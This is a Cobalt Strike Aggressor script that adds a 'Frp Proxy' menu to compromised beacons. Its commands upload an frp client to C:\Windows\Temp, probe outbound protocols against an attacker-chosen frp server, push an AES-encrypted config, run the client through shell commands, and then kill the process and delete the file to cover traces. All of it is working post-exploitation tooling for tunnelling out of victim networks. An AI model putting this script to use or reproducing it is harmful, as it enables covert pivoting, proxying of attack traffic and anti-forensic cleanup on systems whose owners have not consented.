popup beacon_bottom {
    menu "Frp Proxy"{

        item "Upload" {
            $bid = $1;
            $dialog = dialog("upload frpc", %(local_Path => "C:\\Windows\\Temp\\", filename => "client.exe", bid => $bid), &upload);
            drow_text($dialog, "local_Path",  "local_path: ");
            drow_text($dialog, "filename",  "filename: ");

            dbutton_action($dialog, "ok");
            dialog_show($dialog);
        }
        sub upload {
            # switch to specify path
            bcd($bid, $3['local_Path']);
            
            bsleep($bid, 0 ,0);
            bupload($bid, script_resource("/script/".$3['filename']));
            #bupload($bid, script_resource("/script/test.txt"));

        }

        item "ProbeProtocol"{
            $bid = $1;
            $dialog = dialog("探测出网协议", %(filename => "client.exe", frpServer => "x.x.x.x", bid => $bid), &probeProtocol);
            drow_text($dialog, "filename",  "filename: ");
            drow_text($dialog, "frpServer",  "frpServer: ");
            dbutton_action($dialog, "ok");
            dialog_show($dialog);
        }

        sub probeProtocol{
            bshell($bid, "cmd /c ".$3['filename']." -s ".$3['frpServer']);
            #bsleep($bid, 5, 0);
        }



        item "Generate Aes Config"{
            $bid = $1;
            $dialog = dialog("set config", %(config => "", bid => $bid), &generate);
            drow_text($dialog, "config",  "config: ");
            dbutton_action($dialog, "ok");
            dialog_show($dialog);
        }

        sub generate{

            $AESTOOL_WIN = "/script/encrypt.exe";
            $aes_tool_win = script_resource(($AESTOOL_WIN)."");

            $AESTOOL_MAC = "/script/encrypt";
            $aes_tool_mac = script_resource(($AESTOOL_MAC)."");

            $AESFILE = "/script/test.txt";
            $aes_file = script_resource(($AESFILE)."");


            exec($aes_tool_win ." $3['config'] $aes_file");
            exec($aes_tool_mac ." $3['config'] $aes_file");

            show_message("generate config");
        }

        item "Upload config"{
            $bid = $1;
            bupload($bid, script_resource("/script/test.txt"));
        }       
    

        item "Run"{
            $bid = $1;
            $dialog = dialog("run frpc", %(filename => "client.exe", bid => $bid), &run);
            drow_text($dialog, "filename",  "filename: ");
            dbutton_action($dialog, "ok");
            dialog_show($dialog);
        }

        sub run{
            local('$Filename');
            $Filename =  $3['filename'];
            bshell($bid, "cmd /c $Filename");
            #show_message("Executing command!");
            #bsleep($bid, 5, 0);
        }

        item "Delete" {
            $bid = $1;
            $dialog = dialog("delete", %(filePath => "C:\\Windows\\Temp\\", fileName => "client.exe", bid => $bid), &delete);
            drow_text($dialog, "filePath",  "filePath: ");
            drow_text($dialog, "fileName",  "fileName: ");
            dbutton_action($dialog, "ok");
            dialog_show($dialog);
        }

        sub delete{
            bshell($bid, "taskkill /f /t /im ". $3['fileName'] ." &&  del /f /s /q ".$3['filePath'].$3['fileName']);
        }
    }
}